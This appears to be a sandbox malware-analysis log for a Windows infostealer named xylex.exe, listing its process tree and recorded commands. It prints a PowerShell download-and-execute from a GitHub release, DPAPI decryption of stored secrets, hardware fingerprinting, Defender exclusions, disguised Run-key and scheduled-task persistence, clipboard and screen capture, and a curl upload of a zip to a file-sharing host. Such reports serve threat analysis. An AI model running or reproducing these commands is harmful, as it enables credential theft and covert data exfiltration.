PID 1104 wrote to memory of 3104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1104 wrote to memory of 3104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1104 wrote to memory of 4124 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1104 wrote to memory of 4124 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4124 wrote to memory of 4540 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4124 wrote to memory of 4540 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4540 wrote to memory of 2740 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\system32\cmd.exe
PID 4540 wrote to memory of 2740 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 564 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 564 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2976 wrote to memory of 728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2976 wrote to memory of 728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2640 wrote to memory of 996 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\find.exe
PID 2640 wrote to memory of 996 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\find.exe
PID 2640 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 996 wrote to memory of 4328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 996 wrote to memory of 4328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1276 wrote to memory of 3860 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1276 wrote to memory of 3860 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2440 wrote to memory of 1568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2440 wrote to memory of 1568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2860 wrote to memory of 1512 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2860 wrote to memory of 1512 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2640 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 736 wrote to memory of 2780 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 736 wrote to memory of 2780 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4320 wrote to memory of 1884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4320 wrote to memory of 1884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2376 wrote to memory of 2300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2376 wrote to memory of 2300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 3272 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 3272 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4768 wrote to memory of 3308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 4768 wrote to memory of 3308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 3272 wrote to memory of 3808 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3272 wrote to memory of 3808 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Executor\Xylex.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell $down=New-Object System.Net.WebClient;$url='https://github.com/xylexV5/xylexz/releases/download/vypix/xylex.exe';$file='xylex.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit

C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe

"C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sctyk5ct\sctyk5ct.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES566D.tmp" "c:\Users\Admin\AppData\Local\Temp\sctyk5ct\CSCD9AAD5F942E444D0BE4875BB10432BE9.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,240,132,237,149,45,67,26,224,155,156,8,181,224,96,78,151,154,46,202,101,249,97,141,165,239,101,32,47,174,213,144,44,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,118,4,252,204,118,149,111,47,84,90,247,149,190,34,249,18,252,47,179,62,225,47,93,195,23,120,101,61,101,30,235,48,0,0,0,144,60,90,153,163,30,104,172,123,39,168,11,95,160,138,71,243,107,144,2,50,45,70,124,4,172,47,165,61,165,64,105,236,53,38,158,175,136,209,149,37,63,179,220,166,88,37,85,64,0,0,0,118,167,221,170,254,48,117,31,150,36,196,116,199,187,171,38,184,48,64,53,110,62,94,141,234,254,235,232,6,73,237,45,142,243,225,206,25,5,10,78,242,193,201,184,107,245,34,156,238,170,149,227,218,151,82,101,219,166,72,147,198,231,15,120), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,240,132,237,149,45,67,26,224,155,156,8,181,224,96,78,151,154,46,202,101,249,97,141,165,239,101,32,47,174,213,144,44,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,118,4,252,204,118,149,111,47,84,90,247,149,190,34,249,18,252,47,179,62,225,47,93,195,23,120,101,61,101,30,235,48,0,0,0,144,60,90,153,163,30,104,172,123,39,168,11,95,160,138,71,243,107,144,2,50,45,70,124,4,172,47,165,61,165,64,105,236,53,38,158,175,136,209,149,37,63,179,220,166,88,37,85,64,0,0,0,118,167,221,170,254,48,117,31,150,36,196,116,199,187,171,38,184,48,64,53,110,62,94,141,234,254,235,232,6,73,237,45,142,243,225,206,25,5,10,78,242,193,201,184,107,245,34,156,238,170,149,227,218,151,82,101,219,166,72,147,198,231,15,120), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,30,33,9,7,82,225,214,92,15,159,202,147,139,45,89,87,231,151,227,53,170,79,92,11,223,143,97,106,97,154,161,9,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,21,253,137,58,142,103,70,102,12,189,67,174,111,249,213,75,220,211,167,169,116,14,13,182,98,95,162,252,2,230,176,103,48,0,0,0,52,214,32,138,26,48,216,25,50,239,33,228,149,1,46,204,28,5,199,198,129,96,1,203,31,101,98,78,63,94,55,14,217,3,117,232,82,31,234,98,233,98,205,228,177,255,26,93,64,0,0,0,130,107,36,32,57,149,185,197,48,184,95,52,114,206,152,10,184,207,1,53,59,142,23,125,248,153,95,41,99,30,222,95,238,92,97,132,248,36,245,34,7,59,219,119,201,126,196,81,133,18,22,202,225,208,186,249,141,11,195,129,16,159,30,250), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,30,33,9,7,82,225,214,92,15,159,202,147,139,45,89,87,231,151,227,53,170,79,92,11,223,143,97,106,97,154,161,9,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,21,253,137,58,142,103,70,102,12,189,67,174,111,249,213,75,220,211,167,169,116,14,13,182,98,95,162,252,2,230,176,103,48,0,0,0,52,214,32,138,26,48,216,25,50,239,33,228,149,1,46,204,28,5,199,198,129,96,1,203,31,101,98,78,63,94,55,14,217,3,117,232,82,31,234,98,233,98,205,228,177,255,26,93,64,0,0,0,130,107,36,32,57,149,185,197,48,184,95,52,114,206,152,10,184,207,1,53,59,142,23,125,248,153,95,41,99,30,222,95,238,92,97,132,248,36,245,34,7,59,219,119,201,126,196,81,133,18,22,202,225,208,186,249,141,11,195,129,16,159,30,250), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\system32\cscript.exe

cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get serialnumber

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rvdillkg\rvdillkg.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A64.tmp" "c:\Users\Admin\AppData\Local\Temp\rvdillkg\CSCFC39675825334B599630273D765063DF.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Description,PNPDeviceID

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic memorychip get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get processorid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"

C:\Windows\system32\getmac.exe

getmac /NH

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe" /f

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Pogmxnrt.zip";"

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\curl.exe

curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Pogmxnrt.zip";

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

